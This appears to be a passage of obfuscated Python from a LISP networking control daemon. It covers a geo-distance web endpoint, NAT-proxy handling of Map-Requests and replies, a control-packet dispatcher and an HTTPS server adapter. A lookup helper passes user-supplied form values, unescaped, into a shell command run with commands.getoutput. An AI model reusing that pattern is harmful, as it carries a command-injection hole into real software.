OoooOo0 = lisp . lisp_address ( lisp . LISP_AFI_NONE , "" , 0 , 0 )
IiI1Ii1ii = [ ]
for oo0OoOO0o0o in [ eid1 , eid2 ] :
if 44 - 44: I1IiiI % Ii1I * I1IiiI . Oo0Ooo + I1ii11iIi11i . OOooOOo
if 6 - 6: IiII * OoooooooOO + I1Ii111 / Ii1I
if 35 - 35: ooOoO0o % I1IiiI - ooOoO0o - OoO0O00 - OoooooooOO
if 46 - 46: i1IIi . i1IIi . oO0o / I11i / ooOoO0o
if 34 - 34: OoooooooOO / Oo0Ooo * i11iIiiIii . II111iiii . OoooooooOO
if ( OoooOo0 . is_geo_string ( oo0OoOO0o0o ) ) :
IiI1Ii1ii . append ( oo0OoOO0o0o )
continue
if 59 - 59: i11iIiiIii . OoooooooOO / I11i * I1ii11iIi11i + OoooooooOO
if 3 - 3: i11iIiiIii * Oo0Ooo % iIii1I11I1II1 % I1IiiI * iII111i / OOooOOo
OOoOO0o0o0 = 'python {} "{}" to {} count 1' . format ( O0OoO0o , oo0OoOO0o0o , OO0OOO00 )
for IIiI1Ii in [ OOoOO0o0o0 , OOoOO0o0o0 + " no-info" ] :
# run the plain command first, then retry with "no-info" appended
i1I1ii = commands . getoutput ( IIiI1Ii )
iIIIiiiIiI1 = i1I1ii . find ( "geo: " )
if ( iIIIiiiIiI1 == - 1 ) :
if ( IIiI1Ii != OOoOO0o0o0 ) : IiI1Ii1ii . append ( None )
continue
if 95 - 95: IiII * O0 * I1Ii111 . OoooooooOO % Oo0Ooo + I1ii11iIi11i
i1I1ii = i1I1ii [ iIIIiiiIiI1 + len ( "geo: " ) : : ]
iIIIiiiIiI1 = i1I1ii . find ( "\n" )
if ( iIIIiiiIiI1 == - 1 ) :
if ( IIiI1Ii != OOoOO0o0o0 ) : IiI1Ii1ii . append ( None )
continue
if 98 - 98: oO0o . OoooooooOO
IiI1Ii1ii . append ( i1I1ii [ 0 : iIIIiiiIiI1 ] )
break
if 54 - 54: O0 / IiII % ooOoO0o * i1IIi * O0
if 48 - 48: o0oOOo0O0Ooo . oO0o % OoOoOO00 - OoOoOO00
return ( IiI1Ii1ii )
if 33 - 33: I11i % II111iiii + OoO0O00
if 93 - 93: i1IIi . IiII / I1IiiI + IiII
if 58 - 58: I1ii11iIi11i + O0 . Oo0Ooo + OoOoOO00 - OoO0O00 - OoOoOO00
if 41 - 41: Oo0Ooo / i1IIi / Oo0Ooo - iII111i . o0oOOo0O0Ooo
if 65 - 65: O0 * i11iIiiIii . OoooooooOO / I1IiiI / iII111i
if 69 - 69: ooOoO0o % ooOoO0o
if 76 - 76: i11iIiiIii * iII111i / OoO0O00 % I1ii11iIi11i + OOooOOo
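# URL /lisp/geo (POST): given a geo-point and a geo-prefix (either literal
# geo-strings or EIDs that are looked up), display both locations, the
# distance between them in kilometers, and whether the point falls inside
# the prefix's radius.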
@ bottle . post ( '/lisp/geo' )
def IiIi1II111I ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 80 - 80: Ii1I / OOooOOo
if 21 - 21: Oo0Ooo - iIii1I11I1II1 - I1Ii111
oo0OoOO0o0o = bottle . request . forms . get ( "geo-point" )
III1I1Iii11i = bottle . request . forms . get ( "geo-prefix" )
i1I1ii = ""
if 96 - 96: oO0o - oO0o
if 87 - 87: Oo0Ooo / OoooooooOO - I1ii11iIi11i . IiII + iIii1I11I1II1 . I1ii11iIi11i
if 4 - 4: OoooooooOO + ooOoO0o . i1IIi / O0 - O0
if 52 - 52: OoO0O00 * OoooooooOO
if 12 - 12: O0 + IiII * i1IIi . OoO0O00
o0OO0oooo = lisp . lisp_address ( lisp . LISP_AFI_NONE , "" , 0 , 0 )
I11II1i1 = lisp . lisp_geo ( "" )
IiI1ii11I1 = lisp . lisp_geo ( "" )
I1i1iI , I1iI1I1ii1 = oOOOOO0Ooooo ( oo0OoOO0o0o , III1I1Iii11i )
if 33 - 33: o0oOOo0O0Ooo / O0 + OOooOOo
if 75 - 75: IiII % i11iIiiIii + iIii1I11I1II1
if 92 - 92: OoOoOO00 % O0
if 55 - 55: iIii1I11I1II1 * iII111i
if 85 - 85: iIii1I11I1II1 . II111iiii
if ( o0OO0oooo . is_geo_string ( oo0OoOO0o0o ) ) :
if ( I11II1i1 . parse_geo_string ( oo0OoOO0o0o ) == False ) :
i1I1ii = "Could not parse geo-point format"
if 54 - 54: Ii1I . OoooooooOO % Oo0Ooo
elif ( I1i1iI == None ) :
i1I1ii = "EID {} lookup could not find geo-point" . format (
lisp . bold ( oo0OoOO0o0o , True ) )
elif ( I11II1i1 . parse_geo_string ( I1i1iI ) == False ) :
i1I1ii = "Could not parse geo-point format returned from lookup"
if 22 - 22: OOooOOo
if 22 - 22: iII111i * I11i - Oo0Ooo * O0 / i11iIiiIii
if 78 - 78: Oo0Ooo * O0 / ooOoO0o + OoooooooOO + OOooOOo
if 23 - 23: iII111i % OoooooooOO / iIii1I11I1II1 + I1ii11iIi11i / i1IIi / o0oOOo0O0Ooo
if 94 - 94: i1IIi
if 36 - 36: I1IiiI + Oo0Ooo
if ( i1I1ii == "" ) :
if ( o0OO0oooo . is_geo_string ( III1I1Iii11i ) ) :
if ( IiI1ii11I1 . parse_geo_string ( III1I1Iii11i ) == False ) :
i1I1ii = "Could not parse geo-prefix format"
if 46 - 46: iII111i
elif ( I1iI1I1ii1 == None ) :
i1I1ii = "EID-prefix {} lookup could not find geo-prefix" . format ( lisp . bold ( III1I1Iii11i , True ) )
if 65 - 65: i1IIi . I1ii11iIi11i / ooOoO0o
elif ( IiI1ii11I1 . parse_geo_string ( I1iI1I1ii1 ) == False ) :
i1I1ii = "Could not parse geo-prefix format returned from lookup"
if 11 - 11: IiII * ooOoO0o / ooOoO0o - OOooOOo
if 68 - 68: I1IiiI % IiII - IiII / I1IiiI + I1ii11iIi11i - Oo0Ooo
if 65 - 65: ooOoO0o - i1IIi
if 62 - 62: I11i / oO0o % Oo0Ooo . OoooooooOO / i11iIiiIii / I1Ii111
if 60 - 60: I1IiiI % oO0o / o0oOOo0O0Ooo % oO0o * i11iIiiIii / iII111i
if 34 - 34: I1Ii111 - OOooOOo
if 25 - 25: oO0o % I1IiiI + i11iIiiIii + O0 * OoooooooOO
if ( i1I1ii == "" ) :
oo0OoOO0o0o = "" if ( oo0OoOO0o0o == I1i1iI ) else ", EID {}" . format ( oo0OoOO0o0o )
III1I1Iii11i = "" if ( III1I1Iii11i == I1iI1I1ii1 ) else ", EID-prefix {}" . format ( III1I1Iii11i )
if 64 - 64: i1IIi
if 10 - 10: I1Ii111 % O0 / I1IiiI % I11i
iiII = I11II1i1 . print_geo_url ( )
I1iI1111i = IiI1ii11I1 . print_geo_url ( )
I1Ii1iIIIIi = IiI1ii11I1 . radius
iii = I11II1i1 . dms_to_decimal ( )
iii = ( round ( iii [ 0 ] , 6 ) , round ( iii [ 1 ] , 6 ) )
O000OOO = IiI1ii11I1 . dms_to_decimal ( )
O000OOO = ( round ( O000OOO [ 0 ] , 6 ) , round ( O000OOO [ 1 ] , 6 ) )
o0 = round ( IiI1ii11I1 . get_distance ( I11II1i1 ) , 2 )
IIi1 = "inside" if IiI1ii11I1 . point_in_circle ( I11II1i1 ) else "outside"
if 73 - 73: OOooOOo + OOooOOo % I11i * i1IIi
if 4 - 4: OOooOOo - oO0o % OoOoOO00 / II111iiii % oO0o
O0OO0OoO = lisp . space ( 2 )
o0OOo = lisp . space ( 1 )
IiI1Ii11Ii = lisp . space ( 3 )
if 99 - 99: O0 . o0oOOo0O0Ooo % I11i - Oo0Ooo / I11i
i1I1ii = ( "Geo-Point:{}{} {}{}<br>Geo-Prefix:{}{} {}, {} " + "kilometer radius{}<br>" ) . format ( O0OO0OoO , iiII , iii , oo0OoOO0o0o ,
# I1Ii111 / OoOoOO00
o0OOo , I1iI1111i , O000OOO , I1Ii1iIIIIi , III1I1Iii11i )
i1I1ii += "Distance:{}{} kilometers, point is {} of circle" . format ( IiI1Ii11Ii ,
o0 , lisp . bold ( IIi1 , True ) )
if 82 - 82: OoooooooOO . Ii1I
return ( lispconfig . lisp_show_wrapper ( lisp . lisp_print_cour ( i1I1ii ) ) )
if 26 - 26: oO0o + IiII - II111iiii . II111iiii + I1ii11iIi11i + OoOoOO00
if 68 - 68: O0
if 76 - 76: I1ii11iIi11i
if 99 - 99: o0oOOo0O0Ooo
if 1 - 1: Ii1I * OoOoOO00 * OoO0O00 + Oo0Ooo
if 90 - 90: I1Ii111 % Oo0Ooo - Oo0Ooo . iIii1I11I1II1 / OOooOOo + I11i
if 89 - 89: oO0o
if 87 - 87: iII111i % Oo0Ooo
if 62 - 62: OoO0O00 + ooOoO0o / iII111i * i11iIiiIii
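# Find a NAT-traversal info-source: either by RLOC address and port, or by
# the Map-Request nonce it registered. Returns None if not found.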
def iiIIIIiI111 ( addr_str , port , nonce ) :
if ( addr_str != None ) :
for OoooOO0Oo0 in lisp . lisp_info_sources_by_address . values ( ) :
I1iIiIii = OoooOO0Oo0 . address . print_address_no_iid ( )
if ( I1iIiIii == addr_str and OoooOO0Oo0 . port == port ) :
return ( OoooOO0Oo0 )
if 76 - 76: OoO0O00 . OoooooooOO % I1Ii111 * Ii1I
if 23 - 23: IiII + iIii1I11I1II1
return ( None )
if 14 - 14: O0 % IiII % Ii1I * oO0o
if 65 - 65: I11i % oO0o + I1ii11iIi11i
if ( nonce != None ) :
if ( nonce not in lisp . lisp_info_sources_by_nonce ) : return ( None )
return ( lisp . lisp_info_sources_by_nonce [ nonce ] )
if 86 - 86: iIii1I11I1II1 / O0 . I1Ii111 % iIii1I11I1II1 % Oo0Ooo
return ( None )
if 86 - 86: i11iIiiIii - o0oOOo0O0Ooo . ooOoO0o * Oo0Ooo / Ii1I % o0oOOo0O0Ooo
if 61 - 61: o0oOOo0O0Ooo + OoOoOO00
if 15 - 15: OoOoOO00 * oO0o + OOooOOo . I11i % I1IiiI - ooOoO0o
if 13 - 13: OoOoOO00 % OoOoOO00 % Oo0Ooo % I1IiiI * i1IIi % I11i
if 82 - 82: IiII . OoOoOO00 / ooOoO0o + iII111i - ooOoO0o
if 55 - 55: ooOoO0o % Oo0Ooo % o0oOOo0O0Ooo
if 29 - 29: IiII / iIii1I11I1II1 + I1ii11iIi11i % iII111i % I11i
if 46 - 46: iIii1I11I1II1
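# Proxy a Map-Request that arrived inside an ECM from a NAT'ed info-source:
# decode the ECM and Map-Request, cache the nonce for the source, replace
# the ITR-RLOC list with our own RLOC, and re-encapsulate the request toward
# the mapping system. Returns False if an ITR-RLOC is local, meaning the
# packet should be processed normally instead of proxied.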
def oo0oO00o0O00o ( lisp_sockets , info_source , packet ) :
if 98 - 98: ooOoO0o . OOooOOo
if 60 - 60: OoO0O00 - i1IIi . OOooOOo + OOooOOo * OOooOOo + Ii1I
if 66 - 66: OOooOOo * OOooOOo / iIii1I11I1II1 + OoOoOO00 . OOooOOo
if 51 - 51: I1ii11iIi11i
o0oOOOOoo0 = lisp . lisp_ecm ( 0 )
packet = o0oOOOOoo0 . decode ( packet )
if ( packet == None ) :
lisp . lprint ( "Could not decode ECM packet" )
return ( True )
if 80 - 80: i11iIiiIii % I1ii11iIi11i
if 54 - 54: o0oOOo0O0Ooo + I11i - iIii1I11I1II1 % ooOoO0o % IiII
I1ii1II1iII = lisp . lisp_control_header ( )
if ( I1ii1II1iII . decode ( packet ) == None ) :
lisp . lprint ( "Could not decode control header" )
return ( True )
if 19 - 19: I1ii11iIi11i / iIii1I11I1II1 % i1IIi . OoooooooOO
if ( I1ii1II1iII . type != lisp . LISP_MAP_REQUEST ) :
lisp . lprint ( "Received ECM without Map-Request inside" )
return ( True )
if 57 - 57: ooOoO0o . Oo0Ooo - OoO0O00 - i11iIiiIii * I1Ii111 / o0oOOo0O0Ooo
if 79 - 79: I1ii11iIi11i + o0oOOo0O0Ooo % Oo0Ooo * o0oOOo0O0Ooo
if 21 - 21: iII111i
if 24 - 24: iII111i / ooOoO0o
if 61 - 61: iIii1I11I1II1 + oO0o
i1IiiI = lisp . lisp_map_request ( )
packet = i1IiiI . decode ( packet , None , 0 )
O0OOO0 = i1IiiI . nonce
o0OIi = info_source . address . print_address_no_iid ( )
if 11 - 11: oO0o . I1IiiI + IiII / i1IIi
if 1 - 1: Oo0Ooo * I1Ii111 . OoooooooOO
if 73 - 73: OoOoOO00 % o0oOOo0O0Ooo
if 71 - 71: oO0o - OoooooooOO * Oo0Ooo * I11i + o0oOOo0O0Ooo * I1ii11iIi11i
i1IiiI . print_map_request ( )
if 85 - 85: i11iIiiIii . OoooooooOO - iIii1I11I1II1
lisp . lprint ( "Process {} from info-source {}, port {}, nonce 0x{}" . format ( lisp . bold ( "nat-proxy Map-Request" , False ) ,
# O0 % ooOoO0o % I11i
lisp . red ( o0OIi , False ) , info_source . port ,
lisp . lisp_hex_string ( O0OOO0 ) ) )
if 25 - 25: OoooooooOO % Ii1I * II111iiii - OoO0O00
if 95 - 95: I1IiiI % I1Ii111 * I1IiiI + O0 . I1Ii111 % OoooooooOO
if 6 - 6: OoOoOO00 - ooOoO0o * o0oOOo0O0Ooo + OoOoOO00 % o0oOOo0O0Ooo
if 100 - 100: OoO0O00 % I1Ii111 - I11i % I11i % I11i / ooOoO0o
if 83 - 83: oO0o - ooOoO0o - IiII % i1IIi - iII111i . o0oOOo0O0Ooo
info_source . cache_nonce_for_info_source ( O0OOO0 )
if 96 - 96: Oo0Ooo + I1Ii111 . i1IIi
if 54 - 54: II111iiii . i1IIi / I1ii11iIi11i % I1IiiI / I1Ii111
if 65 - 65: OoOoOO00 . OoOoOO00 - oO0o + Oo0Ooo / i11iIiiIii
if 90 - 90: iIii1I11I1II1 + OoOoOO00
if 9 - 9: iIii1I11I1II1 . OoooooooOO + i1IIi - Oo0Ooo
info_source . no_timeout = i1IiiI . subscribe_bit
if 30 - 30: iII111i / OoO0O00 . iII111i
if 17 - 17: Oo0Ooo + OoooooooOO * OoooooooOO
if 5 - 5: I1Ii111 % OoooooooOO . OoOoOO00
if 67 - 67: I1ii11iIi11i + Ii1I
if 72 - 72: IiII % o0oOOo0O0Ooo
if 93 - 93: iIii1I11I1II1 + i11iIiiIii . o0oOOo0O0Ooo . i1IIi % I1IiiI % ooOoO0o
for oO0oo in i1IiiI . itr_rlocs :
if ( oO0oo . is_local ( ) ) : return ( False )
if 52 - 52: IiII % ooOoO0o
if 25 - 25: I11i / I11i % OoooooooOO - I1ii11iIi11i * oO0o
if 23 - 23: i11iIiiIii
if 100 - 100: oO0o + O0 . I1IiiI + i1IIi - OoOoOO00 + o0oOOo0O0Ooo
if 65 - 65: II111iiii / Oo0Ooo
iiII1i = lisp . lisp_myrlocs [ 0 ]
i1IiiI . itr_rloc_count = 0
i1IiiI . itr_rlocs = [ ]
i1IiiI . itr_rlocs . append ( iiII1i )
if 19 - 19: I1IiiI + i11iIiiIii . IiII - I11i / Ii1I + o0oOOo0O0Ooo
packet = i1IiiI . encode ( None , 0 )
i1IiiI . print_map_request ( )
if 38 - 38: Oo0Ooo / iIii1I11I1II1 * iIii1I11I1II1 % I1ii11iIi11i
O00o = i1IiiI . target_eid
if ( O00o . is_ipv6 ( ) ) :
o0o0ooOo00 = lisp . lisp_myrlocs [ 1 ]
if ( o0o0ooOo00 != None ) : iiII1i = o0o0ooOo00
if 91 - 91: OoO0O00 * I1Ii111 % OoO0O00 . o0oOOo0O0Ooo * I1ii11iIi11i . OOooOOo
if 13 - 13: I1ii11iIi11i
if 80 - 80: Oo0Ooo % IiII % OoooooooOO * Oo0Ooo % Ii1I
if 41 - 41: OoooooooOO / i1IIi
if 70 - 70: OoOoOO00 % o0oOOo0O0Ooo % i1IIi / I1ii11iIi11i % i11iIiiIii / i1IIi
i1i1Ii1IiIII = lisp . lisp_is_running ( "lisp-ms" )
lisp . lisp_send_ecm ( lisp_sockets , packet , O00o , lisp . LISP_CTRL_PORT ,
O00o , iiII1i , to_ms = i1i1Ii1IiIII , ddt = False )
return ( True )
if 9 - 9: I11i - oO0o + O0 / iII111i % i1IIi
if 97 - 97: o0oOOo0O0Ooo * ooOoO0o
if 78 - 78: I11i . OOooOOo + oO0o * iII111i - i1IIi
if 27 - 27: Ii1I % i1IIi . Oo0Ooo % I1Ii111
if 10 - 10: IiII / OoooooooOO
if 50 - 50: i11iIiiIii - OoooooooOO . oO0o + O0 . i1IIi
if 91 - 91: o0oOOo0O0Ooo . iII111i % Oo0Ooo - iII111i . oO0o % i11iIiiIii
if 25 - 25: iIii1I11I1II1
if 63 - 63: ooOoO0o
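# Forward a Map-Reply (mr_or_mn True) or Map-Notify (False) to the NAT'ed
# info-source it belongs to, using the source's registered RLOC and port.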
def oO0oOOOooo ( lisp_sockets , info_source , packet , mr_or_mn ) :
o0OIi = info_source . address . print_address_no_iid ( )
oOoO0o00OO0 = info_source . port
O0OOO0 = info_source . nonce
if 6 - 6: iIii1I11I1II1 - iIii1I11I1II1 % o0oOOo0O0Ooo / iIii1I11I1II1 * I1Ii111
mr_or_mn = "Reply" if mr_or_mn else "Notify"
mr_or_mn = lisp . bold ( "nat-proxy Map-{}" . format ( mr_or_mn ) , False )
if 3 - 3: OOooOOo . IiII / Oo0Ooo
lisp . lprint ( "Forward {} to info-source {}, port {}, nonce 0x{}" . format ( mr_or_mn , lisp . red ( o0OIi , False ) , oOoO0o00OO0 ,
# iIii1I11I1II1 % iIii1I11I1II1 / ooOoO0o . oO0o + I1Ii111 . I1Ii111
lisp . lisp_hex_string ( O0OOO0 ) ) )
if 90 - 90: o0oOOo0O0Ooo / OOooOOo - OOooOOo . I1IiiI
if 82 - 82: I1Ii111 . I1Ii111 - iII111i
if 72 - 72: i11iIiiIii
if 94 - 94: OOooOOo
i1IiI1ii1i = lisp . lisp_convert_4to6 ( o0OIi )
lisp . lisp_send ( lisp_sockets , i1IiI1ii1i , oOoO0o00OO0 , packet )
if 39 - 39: OOooOOo + OoO0O00
if 80 - 80: OOooOOo % OoO0O00 / OoOoOO00
if 54 - 54: Oo0Ooo % OoO0O00 - OOooOOo - I11i
if 71 - 71: ooOoO0o . i11iIiiIii
if 56 - 56: O0 * iII111i + iII111i * iIii1I11I1II1 / ooOoO0o * I1Ii111
if 25 - 25: iIii1I11I1II1 . I11i * i11iIiiIii + Oo0Ooo * I11i
if 67 - 67: iII111i
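# Main control-packet dispatcher for the lisp-core process: decode the
# control header and hand the packet to the right component over IPC
# (lisp-ms, lisp-itr, lisp-etr, lisp-mr, lisp-rtr), to a waiting lisp-lig or
# lisp-rig instance, or handle NAT Info-Requests and proxied replies locally.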
def oooO0o ( lisp_sockets , source , sport , packet ) :
global Oo
if 19 - 19: OOooOOo % OoO0O00 / Ii1I + II111iiii % OoooooooOO
I1ii1II1iII = lisp . lisp_control_header ( )
if ( I1ii1II1iII . decode ( packet ) == None ) :
lisp . lprint ( "Could not decode control header" )
return
if 89 - 89: Ii1I
if 51 - 51: iII111i
if 68 - 68: iII111i - o0oOOo0O0Ooo * OoO0O00 % ooOoO0o . ooOoO0o - iIii1I11I1II1
if 22 - 22: OoooooooOO / I1ii11iIi11i % iII111i * OoOoOO00
if 32 - 32: OoooooooOO % oO0o % iIii1I11I1II1 / O0
if 61 - 61: II111iiii . O0 - Ii1I - I1ii11iIi11i / i11iIiiIii - II111iiii
if 98 - 98: Ii1I - I1IiiI . i11iIiiIii * Oo0Ooo
if 29 - 29: Ii1I / ooOoO0o % I11i
if 10 - 10: iIii1I11I1II1 % OoooooooOO % I1ii11iIi11i
if 39 - 39: II111iiii * OoOoOO00 . O0 * I11i
if ( I1ii1II1iII . type == lisp . LISP_NAT_INFO ) :
if ( I1ii1II1iII . info_reply == False ) :
lisp . lisp_process_info_request ( lisp_sockets , packet , source , sport ,
lisp . lisp_ms_rtr_list )
if 89 - 89: Ii1I - ooOoO0o . I11i - I1Ii111 - I1IiiI
return
if 79 - 79: IiII + IiII + Ii1I
if 39 - 39: O0 - OoooooooOO
oo0O00ooo0o = packet
packet = lisp . lisp_packet_ipc ( packet , source , sport )
if 29 - 29: OoooooooOO . II111iiii % OoOoOO00
if 26 - 26: iIii1I11I1II1 - I1ii11iIi11i . IiII . IiII + iIii1I11I1II1 * Oo0Ooo
if 85 - 85: OOooOOo + II111iiii - OOooOOo * oO0o - i1IIi % iII111i
if 1 - 1: OoooooooOO / O0 + OoOoOO00 + OoOoOO00 . I1Ii111 - OoOoOO00
if ( I1ii1II1iII . type in ( lisp . LISP_MAP_REGISTER , lisp . LISP_MAP_NOTIFY_ACK ) ) :
lisp . lisp_ipc ( packet , Oo , "lisp-ms" )
return
if 9 - 9: I1Ii111 * OoooooooOO % I1IiiI / OoOoOO00 * I11i
if 48 - 48: OoooooooOO . OoOoOO00
if 65 - 65: oO0o . Oo0Ooo
if 94 - 94: OoOoOO00 + IiII . ooOoO0o
if 69 - 69: O0 - O0
if ( I1ii1II1iII . type == lisp . LISP_MAP_REPLY ) :
i1I1i1i1I1 = lisp . lisp_map_reply ( )
i1I1i1i1I1 . decode ( oo0O00ooo0o )
if 17 - 17: OoOoOO00 + OoooooooOO % OOooOOo
OoooOO0Oo0 = iiIIIIiI111 ( None , 0 , i1I1i1i1I1 . nonce )
if ( OoooOO0Oo0 ) :
oO0oOOOooo ( lisp_sockets , OoooOO0Oo0 , oo0O00ooo0o , True )
else :
O0OoO0o = "/tmp/lisp-lig"
if ( os . path . exists ( O0OoO0o ) ) :
lisp . lisp_ipc ( packet , Oo , O0OoO0o )
else :
lisp . lisp_ipc ( packet , Oo , "lisp-itr" )
if 36 - 36: i11iIiiIii + I1ii11iIi11i % OOooOOo . I1IiiI - ooOoO0o
if 94 - 94: I1IiiI % OoOoOO00 . IiII . ooOoO0o . OoO0O00
return
if 53 - 53: OoOoOO00
if 84 - 84: OoO0O00
if 97 - 97: i1IIi
if 98 - 98: OoooooooOO - I1IiiI + ooOoO0o
if 98 - 98: iII111i . IiII . IiII - OOooOOo
if ( I1ii1II1iII . type == lisp . LISP_MAP_NOTIFY ) :
oOOO0o = lisp . lisp_map_notify ( lisp_sockets )
oOOO0o . decode ( oo0O00ooo0o )
if 18 - 18: I1ii11iIi11i / Oo0Ooo - iII111i
OoooOO0Oo0 = iiIIIIiI111 ( None , 0 , oOOO0o . nonce )
if ( OoooOO0Oo0 ) :
oO0oOOOooo ( lisp_sockets , OoooOO0Oo0 , oo0O00ooo0o ,
False )
else :
O0OoO0o = "/tmp/lisp-lig"
if ( os . path . exists ( O0OoO0o ) ) :
lisp . lisp_ipc ( packet , Oo , O0OoO0o )
else :
OOoO00ooO = "lisp-rtr" if lisp . lisp_is_running ( "lisp-rtr" ) else "lisp-etr"
if 69 - 69: oO0o / IiII * ooOoO0o
lisp . lisp_ipc ( packet , Oo , OOoO00ooO )
if 81 - 81: oO0o
if 62 - 62: Ii1I + O0 * OoO0O00
return
if 59 - 59: II111iiii
if 43 - 43: Oo0Ooo + OoooooooOO
if 47 - 47: ooOoO0o
if 92 - 92: I11i % i11iIiiIii % Oo0Ooo
if 23 - 23: II111iiii * iII111i
if 80 - 80: I1Ii111 / i11iIiiIii + OoooooooOO
if ( I1ii1II1iII . type == lisp . LISP_MAP_REFERRAL ) :
II1io0 = "/tmp/lisp-rig"
if ( os . path . exists ( II1io0 ) ) :
lisp . lisp_ipc ( packet , Oo , II1io0 )
else :
lisp . lisp_ipc ( packet , Oo , "lisp-mr" )
if 38 - 38: I1ii11iIi11i % ooOoO0o + i1IIi * OoooooooOO * oO0o
return
if 83 - 83: iIii1I11I1II1 - ooOoO0o - I1Ii111 / OoO0O00 - O0
if 81 - 81: Ii1I - oO0o * I1ii11iIi11i / I1Ii111
if 21 - 21: OoO0O00
if 63 - 63: I11i . O0 * I11i + iIii1I11I1II1
if 46 - 46: i1IIi + II111iiii * i1IIi - Ii1I
if 79 - 79: II111iiii - oO0o * I1ii11iIi11i - OoOoOO00 . I1ii11iIi11i
if ( I1ii1II1iII . type == lisp . LISP_MAP_REQUEST ) :
OOoO00ooO = "lisp-itr" if ( I1ii1II1iII . is_smr ( ) ) else "lisp-etr"
if 11 - 11: O0 * OoOoOO00
if 37 - 37: OoOoOO00 + O0 . O0 * Oo0Ooo % I1Ii111 / iII111i
if 18 - 18: OoooooooOO
if 57 - 57: ooOoO0o . OoOoOO00 * o0oOOo0O0Ooo - OoooooooOO
if 75 - 75: i11iIiiIii / o0oOOo0O0Ooo . IiII . i1IIi . i1IIi / I11i
if ( I1ii1II1iII . rloc_probe ) : return
if 94 - 94: ooOoO0o + I1IiiI
lisp . lisp_ipc ( packet , Oo , OOoO00ooO )
return
if 56 - 56: OoOoOO00 % o0oOOo0O0Ooo
if 40 - 40: OOooOOo / IiII
if 29 - 29: Ii1I - Ii1I / ooOoO0o
if 49 - 49: I11i + oO0o % OoO0O00 - Oo0Ooo - O0 - OoooooooOO
if 4 - 4: II111iiii - oO0o % Oo0Ooo * i11iIiiIii
if 18 - 18: Oo0Ooo % O0
if 66 - 66: iIii1I11I1II1 % i11iIiiIii / I1IiiI
if 47 - 47: I1ii11iIi11i * oO0o + iIii1I11I1II1 - oO0o / IiII
if ( I1ii1II1iII . type == lisp . LISP_ECM ) :
OoooOO0Oo0 = iiIIIIiI111 ( source , sport , None )
if ( OoooOO0Oo0 ) :
if ( oo0oO00o0O00o ( lisp_sockets , OoooOO0Oo0 ,
oo0O00ooo0o ) ) : return
if 86 - 86: IiII
if 43 - 43: I1IiiI / iII111i / ooOoO0o + iIii1I11I1II1 + OoooooooOO
OOoO00ooO = "lisp-mr"
if ( I1ii1II1iII . is_to_etr ( ) ) :
OOoO00ooO = "lisp-etr"
elif ( I1ii1II1iII . is_to_ms ( ) ) :
OOoO00ooO = "lisp-ms"
elif ( I1ii1II1iII . is_ddt ( ) ) :
if ( lisp . lisp_is_running ( "lisp-ddt" ) ) :
OOoO00ooO = "lisp-ddt"
elif ( lisp . lisp_is_running ( "lisp-ms" ) ) :
OOoO00ooO = "lisp-ms"
if 33 - 33: II111iiii - IiII - ooOoO0o
elif ( lisp . lisp_is_running ( "lisp-mr" ) == False ) :
OOoO00ooO = "lisp-etr"
if 92 - 92: OoO0O00 * IiII
lisp . lisp_ipc ( packet , Oo , OOoO00ooO )
if 92 - 92: oO0o
return
if 7 - 7: iII111i
if 73 - 73: OoO0O00 % I1ii11iIi11i
if 32 - 32: OOooOOo + iII111i + iIii1I11I1II1 * Oo0Ooo
if 62 - 62: i11iIiiIii
if 2 - 2: I1IiiI
if 69 - 69: OoooooooOO / Oo0Ooo * I1Ii111
if 99 - 99: II111iiii * iIii1I11I1II1 % O0 * oO0o / II111iiii % OoooooooOO
if 14 - 14: IiII . IiII % ooOoO0o
if 42 - 42: o0oOOo0O0Ooo . OOooOOo - ooOoO0o
if 33 - 33: II111iiii / O0 / IiII - I11i - i1IIi
if 8 - 8: i11iIiiIii . iII111i / iIii1I11I1II1 / I1ii11iIi11i / IiII - Ii1I
if 32 - 32: o0oOOo0O0Ooo . i1IIi * Oo0Ooo
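# bottle ServerAdapter that serves the web interface over HTTPS with the CherryPy WSGI
# server, using ./lisp-cert.pem as both certificate and key (copied from
# lisp-cert.pem.default if it does not exist yet).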
class O0oooo0O ( bottle . ServerAdapter ) :
def run ( self , hand ) :
Ii1iiIIi1i = "./lisp-cert.pem"
if 44 - 44: o0oOOo0O0Ooo
if 51 - 51: II111iiii
if 10 - 10: OoO0O00 % OoO0O00 / o0oOOo0O0Ooo - OoOoOO00
if 44 - 44: ooOoO0o - O0 / II111iiii . iIii1I11I1II1 . i1IIi
if 63 - 63: iIii1I11I1II1 + IiII % i1IIi / I1IiiI % II111iiii
if ( os . path . exists ( Ii1iiIIi1i ) == False ) :
os . system ( "cp ./lisp-cert.pem.default {}" . format ( Ii1iiIIi1i ) )
lisp . lprint ( ( "{} does not exist, creating a copy from lisp-" + "cert.pem.default" ) . format ( Ii1iiIIi1i ) )
if 60 - 60: o0oOOo0O0Ooo . OoOoOO00 % I1Ii111 / I1IiiI / O0
if 19 - 19: i11iIiiIii . I1IiiI + II111iiii / OOooOOo . I1ii11iIi11i * ooOoO0o
if 59 - 59: iIii1I11I1II1 / I1ii11iIi11i % ooOoO0o
Oooo = wsgiserver . CherryPyWSGIServer ( ( self . host , self . port ) , hand )
Oooo . ssl_adapter = pyOpenSSLAdapter ( Ii1iiIIi1i , Ii1iiIIi1i , None )
if 74 - 74: ooOoO0o % OoOoOO00 / Oo0Ooo
if 2 - 2: IiII % IiII % I1Ii111
try :
Oooo . start ( )
finally :
Oooo . stop ( )
if 60 - 60: OOooOOo
if 73 - 73: ooOoO0o
if 86 - 86: OoOoOO00 . I11i / Oo0Ooo * I11i
if 20 - 20: ooOoO0o - OOooOOo * OoO0O00 * o0oOOo0O0Ooo * OOooOOo / IiII
if 40 - 40: I1IiiI * o0oOOo0O0Ooo . I1IiiI
if 62 - 62: ooOoO0o + II111iiii % ooOoO0o
if 50 - 50: OoooooooOO + oO0o * I1IiiI - Ii1I / i11iIiiIii
if 5 - 5: O0 - I1IiiI
if 44 - 44: II111iiii . II111iiii + OOooOOo * Ii1I
if 16 - 16: II111iiii
if 100 - 100: O0 - i1IIi
if 48 - 48: oO0o % ooOoO0o + O0
if 27 - 27: I1ii11iIi11i / OOooOOo
if 33 - 33: OoooooooOO % I1ii11iIi11i . O0 / I1ii11iIi11i
if 63 - 63: IiII + iIii1I11I1II1 + I1IiiI + I1Ii111
if 72 - 72: OoO0O00 + i11iIiiIii + I1ii11iIi11i
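# Start the bottle web interface. A negative port selects plain HTTP on the absolute
# port value; otherwise the HTTPS server adapter registered above is used, falling back
# to plain HTTP if it fails to start.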
def oOooOoOOo0O ( bottle_port ) :
lisp . lisp_set_exception ( )
if 41 - 41: iII111i
